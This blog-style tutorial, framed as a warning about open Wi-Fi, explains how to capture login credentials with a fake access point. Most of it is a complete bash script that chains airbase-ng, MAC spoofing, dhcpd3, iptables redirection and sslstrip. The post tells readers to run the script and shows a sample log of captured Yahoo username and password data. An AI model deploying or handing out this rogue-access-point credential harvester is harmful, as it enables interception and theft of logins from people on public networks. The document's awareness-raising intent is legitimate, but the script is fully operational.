
It can be tempting to hop onto an open wireless network when you just need to check your email, or you want to send off a tweet. Stop for a moment though, because an open wireless network might not be as safe as you think. With the right tools, an attacker can turn his laptop into an open wireless access point that captures your online activity.

By combining airbase-ng and sslstrip, we can turn our laptop into an access point that silently captures login credentials. This is a similar technique to what I posted before, except instead of connecting to a network and ARP poisoning the target, we lure the target into connecting to our network and sniff their activity. Here's how it looks:
```bash
#!/bin/bash
#____[start of config]_________________________
# these two values can be overwritten using
# arguments to the command
essid="mylinksys"
channel="11"
# addressing handed out to clients of the fake access point
subnet="192.168.100.0"
startip="192.168.100.100"
endip="192.168.100.200"
broadcast="192.168.100.255"
router="192.168.100.1"
netmask="255.255.255.0"
dns="8.8.8.8"
#____[end of config]___________________________

# override the default essid if one is provided
if [[ -n "${1}" ]]; then
  essid="${1}"
fi
# override the default channel if one is provided
if [[ -n "${2}" ]]; then
  channel="${2}"
fi

# remove every filter and NAT rule so the box starts (and ends) with clean tables
function clear_iptables {
  iptables --flush
  iptables --table nat --flush
  iptables --table nat --delete-chain
  iptables --delete-chain
}

# stop the daemons, remove the temp files and tear the at0 interface down
function cleanup {
  echo "* cleaning up"
  killall sslstrip
  killall dhcpd3
  rm -rf /tmp/dhcpd
  rm -f /tmp/dhcpd.conf
  ifconfig at0 down
  killall airbase-ng
  clear_iptables
  echo "* end of script"
  exit 0
}
# CTRL-C runs cleanup instead of just killing the script
trap cleanup INT

echo "* creating dummy dhcpd.conf"
cat << EOF > /tmp/dhcpd.conf
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet ${subnet} netmask ${netmask} {
  option subnet-mask ${netmask};
  option broadcast-address ${broadcast};
  option routers ${router};
  option domain-name-servers ${dns};
  range ${startip} ${endip};
}
EOF

# airbase-ng creates the tap interface at0 that backs the fake access point
echo "* starting airbase-ng essid ${essid} on channel ${channel}"
airbase-ng -e "${essid}" -q -c "${channel}" mon0 &
sleep 3

echo "* spoofing MAC address for at0"
ifconfig at0 down
macchanger -a at0

echo "* bringing up at0 and setting route"
ifconfig at0 up
ifconfig at0 "${router}" netmask "${netmask}"
route add -net "${subnet}" netmask "${netmask}" gw "${router}"

echo "* starting dhcpd3"
mkdir -p /tmp/dhcpd
touch /tmp/dhcpd/dhcpd.leases
chown -R dhcpd:dhcpd /tmp/dhcpd
dhcpd3 -q -cf /tmp/dhcpd.conf -pf /tmp/dhcpd/dhcpd.pid -lf /tmp/dhcpd/dhcpd.leases at0

# NAT client traffic out through eth0 and allow forwarding from at0
echo "* setting up forwarding rules"
clear_iptables
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
# the host's own first nameserver is used as the upstream DNS target
mygw=$(grep nameserver /etc/resolv.conf | head -1 | cut -d" " -f2)
echo "* using ${mygw} as gateway"
iptables --table nat --append PREROUTING --protocol udp --dport 53 -j DNAT --to "${mygw}"
# this removes the first PREROUTING rule again (the DNS DNAT just added)
iptables -t nat -D PREROUTING 1
# hand client HTTP to sslstrip's listening port
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
echo 1 > /proc/sys/net/ipv4/ip_forward

echo "* starting sslstrip and logging results to log.txt"
sslstrip -f -k -w log.txt &
echo "* setup complete, now we wait for connections"
echo "* enter CTRL-C to quit and cleanup"
# idle until CTRL-C triggers cleanup
while :; do
  sleep 60
done
```
Put your wireless card in monitor mode with airmon-ng and run the script. The script will create a logfile called log.txt which will contain all POST traffic. If you'd prefer to capture SSL and HTTP traffic, pass the -a option to sslstrip. By default the script creates an access point with an SSID of mylinksys. While the script is running, just tail the log file and you'll start to see entries such as this:

```
2011-07-15 18:20:27,752 SECURE POST Data (mlogin.yahoo.com):
_authurl=auth&_done=widget%3Aygo-mail%2Fhome.bp&_sig=&_src=
&_ts=1201692142&_crumb=fI0xXyxcgHakBrA2LoL9nA--&_pc=&_send_userhash=0&_appdata=&_partner_ts=&_is_ysid=1&_page=
secure&_next=nonssl&id=victim&password=hackme&__submit=Sign+In
```
Look at the last line and you'll see that we've captured the login ID for user victim with password hackme.

So the next time you see an open wireless access point, think twice before logging into it. This is but a simple passive attack that just involves gathering data. However, an attacker can set up a more aggressive attack which launches a set of exploits against each device that connects to the wireless access point in an attempt to gain access to the device itself.